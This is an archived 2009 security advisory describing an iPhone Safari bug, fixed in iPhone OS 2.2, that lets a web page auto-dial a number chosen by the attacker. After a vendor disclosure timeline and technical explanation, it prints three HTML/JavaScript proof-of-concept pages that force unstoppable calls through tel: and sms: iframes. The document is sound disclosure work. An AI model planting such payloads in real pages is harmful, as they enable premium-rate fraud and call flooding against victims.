what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

iPhone Safari Phone Auto Dial

iPhone Safari Phone Auto Dial
Posted Jun 19, 2009
Authored by Collin Mulliner

Safari on the Apple iPhone suffers from a vulnerability that allows an attacker to auto-dial a number.

tags | exploit
systems | apple, iphone
SHA-256 | 750d96b2e5b025f4f460cec5ea7897e6f417588a419c661fea5d7b95be167b5c

iPhone Safari Phone Auto Dial

Change Mirror Download
Released since Apple published the iPhone 3.0 security fixes.

Vulnerability Report

--- BEGIN ADVISORY ---

Manufacturer: Apple (www.apple.com)
Device: iPhone 3G (iPhone 1st Gen)
Firmware: 2.1 (possible earlier versions)
Device Type: smart phone

Subsystems: Safari (and mobile telephony)

-----------------------------

Short name:
iPhone Safari phone-auto-dial (vulnerability)

Vulnerability class:
application logic bug

Executive Summary:
A malicious website can initiate a phone call without the need of user
interaction. The destination phone number is chosen by the attacker.

Risk: MEDIUM-HIGH
Medium to high risk due to the possibility of financial gain through
this attack by calling of premium rate numbers (e.g. 1-900 in the
U.S.). Denial-of-service against arbitrary phone numbers through
mass-calling. User cannot prevent attack.

-----------------------------

Reporter: Collin Mulliner <collin[AT]mulliner.org>

-----------------------------

Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)

-----------------------------

Time line:

Oct. 20. 2008: Reported vulnerability to vendor.
Oct. 20. 2008: Vendor acknowledges receiving our email.
Not commenting on the vulnerability itself.
Oct. 27. 2008: Sent update to vendor, also requesting a status report.
Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
Oct. 30. 2008: Sent additional information.
Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
version.
Nov. 20. 2008: Public disclosure.
Jun. 18. 2009: Full-Disclosure.

-----------------------------

Fix:

iPhone OS 2.2
iPhone OS 2.2.1
iPhone OS 3.0

-----------------------------

Technical Details:

The Safari version running on the iPhone supports handling the TEL [1]
protocol through launching the telephony/dialer application. This is
done by passing the provided phone number to the telephony
application. Under normal conditions, loading a tel: URI results in a
message box asking the user's permission to call the given number. The
user is presented with the simple choice to either press call or
cancel.

A TEL URI can be opened automatically if the TEL URI is used as the
source of an HTML iframe or frame, as the URL of a meta refresh, as
the location of a HTTP 30X redirect, and as the location of the
current or a new window using javascript.

We discovered a security vulnerability that dismisses the "ask for
permission to call" dialog in a way that chooses the "call" option
rather than the "cancel" option.

This condition occurs if a TEL URI is activated at the same time
Safari is closed by launching an external application, for example
launching the SMS application (in order to handle a SMS URI [2]). The
SMS application can be launched through placing a SMS URI as the
source of an iframe. This is shown in the first proof-of-concept
exploit below.

Further investigation showed that this behavior can be reproduced by
launching other applications such as: Maps, YouTube, and iTunes.
Launching these applications can be achieved through loading special
URLs using the meta refresh tag. This is shown in the second
proof-of-concept exploit below.

We also discovered that the bug can also be triggered through popup
windows (e.g. javascript alert). In this situation the initiating app
does not need to be termianted in order to active the call.

Finally, we discovered a second bug that can be used to perform
malicious phone calls that cannot be prevented or canceled by the
victim. This bug allows the attacker to freez the GUI (graphical user
interface) for a number of seconds. While the GUI is frozen the call
progresses in the background and cannot be stopped by the victim user.
Freezing the GUI is achieved by passing a "very long" phone number to
the SMS application. The SMS application, immediately after being
started, freezes the iPhone GUI. Also switching off the iPhone cannot
be performed fast enough in order to prevent the malicious call.


[1] http://www.rfc-editor.org/rfc/rfc3966.txt
[2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04

-----------------------------

Further Discussion:

The dialing dialog is clearly shown to the user also the user, in most
cases, can't press cancel quick enough in order to stop the initiation
of the call. Once the external application is launched, the telephony
application is running in the background performing the call. Only
the call forwarding dialog (containing the "dismiss" button) indicates
a call being made.

-----------------------------

Proof-of-Concept with plain HTML using the SMS application:

<html>
<head>
<title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
</title>
</head>
<body>
<iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
<iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
<!-- second iframe is to attack quick users who manage to close the
first call-dialog //-->
<iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
</body>
</html>

Proof-of-Concept using javascript and the Maps application:

<html>
<head>
<title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
</title>
<meta http-equiv="refresh" content="0;
URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
</head>
<body>
<script lang=javascript>
function a() {
document.write("<iframe src=\"tel:+14089748388\" WIDTH=50
HEIGHT=10></iframe>");
}
setTimeout("a()", 100);
</script>
</body>
</html>

Proof-of-Concept attack where the victim user cannot stop the malicious
phone call:

<html>
<head>
<title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
</title>
</head>
<body>
<script lang=javascript>
l = "<iframe src=\"sms:";
for (i = 0; i < 10000; i++) {
l = l + "3340948034298232";
}
l = l + "\" width=10 height=10></iframe><iframe
src=\"tel:+14089748388\" height=10 width=10></iframe>";
document.write(l);
</script>
</body>
</html>

-----------------------------

More Detailed Information:

Demo video available at:
http://www.mulliner.org/iphone/

Advisories:
http://www.mulliner.org/security/advisories/

--- END ADVISORY ---


--
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
If Bill Gates had a nickel for every time Windows crashed... Oh wait, he
does!
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close